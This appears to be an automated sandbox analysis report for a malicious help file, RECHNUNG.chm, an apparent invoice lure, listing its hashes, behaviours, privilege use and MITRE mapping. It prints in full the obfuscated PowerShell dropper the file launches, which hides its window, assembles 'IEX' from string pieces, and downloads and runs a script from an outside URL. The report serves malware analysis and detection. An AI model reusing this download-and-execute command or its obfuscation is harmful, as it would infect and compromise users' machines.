0710eabb964125f65e2ea8587585b1883ce98641ce4da8db46eddc404f8cfa6c

Analysis

max time kernel
43s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
18-10-2022 21:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RECHNUNG.chm
Size

14KB
MD5

498b61349a8668cae80d468b348abb9d
SHA1

603d0fdba865ad02eef0c96462be6d97d431e7ac
SHA256

e268f2982e14d363e7f7874696d231701234d4b426c3a1bef7271cc0bf766706
SHA512

e4281b3210518e2ea965e5d63a070f2eec89ea1d37b9c0d9d65023ec457570b30ab4092e888e75f53797a33143e5bbcdf8ec2845d3176f8bfae02674e126665f
SSDEEP

192:Nco/1QY0OXlb3iQbZaEaJT5cC+aRWTwY2TZhYj1HhIUb:Ncodln53HZ/aLWa0MY21YIc

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://meyeks.com.tr/hala.txt

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	1440	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	hh.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1440	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeIncreaseQuotaPrivilege	1440	powershell.exe
Token: SeSecurityPrivilege	1440	powershell.exe
Token: SeTakeOwnershipPrivilege	1440	powershell.exe
Token: SeLoadDriverPrivilege	1440	powershell.exe
Token: SeSystemProfilePrivilege	1440	powershell.exe
Token: SeSystemtimePrivilege	1440	powershell.exe
Token: SeProfSingleProcessPrivilege	1440	powershell.exe
Token: SeIncBasePriorityPrivilege	1440	powershell.exe
Token: SeCreatePagefilePrivilege	1440	powershell.exe
Token: SeBackupPrivilege	1440	powershell.exe
Token: SeRestorePrivilege	1440	powershell.exe
Token: SeShutdownPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeSystemEnvironmentPrivilege	1440	powershell.exe
Token: SeRemoteShutdownPrivilege	1440	powershell.exe
Token: SeUndockPrivilege	1440	powershell.exe
Token: SeManageVolumePrivilege	1440	powershell.exe
Token: 33	1440	powershell.exe
Token: 34	1440	powershell.exe
Token: 35	1440	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1048	hh.exe
1048	hh.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 1440	1048	hh.exe	28
PID 1048 wrote to memory of 1440	1048	hh.exe	28
PID 1048 wrote to memory of 1440	1048	hh.exe	28

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\RECHNUNG.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://meyeks.com.tr/hala.txt')|P
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1440

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1048-54-0x000007FEFC281000-0x000007FEFC283000-memory.dmp

Filesize
8KB

Download
memory/1440-58-0x000007FEEDAC0000-0x000007FEEE61D000-memory.dmp

Filesize
11.4MB

Download
memory/1440-59-0x000000001B720000-0x000000001BA1F000-memory.dmp

Filesize
3.0MB

Download
memory/1440-60-0x00000000023B4000-0x00000000023B7000-memory.dmp

Filesize
12KB

Download
memory/1440-61-0x00000000023BB000-0x00000000023DA000-memory.dmp

Filesize
124KB

Download
memory/1440-62-0x00000000023B4000-0x00000000023B7000-memory.dmp

Filesize
12KB

Download
memory/1440-63-0x00000000023BB000-0x00000000023DA000-memory.dmp

Filesize
124KB

Download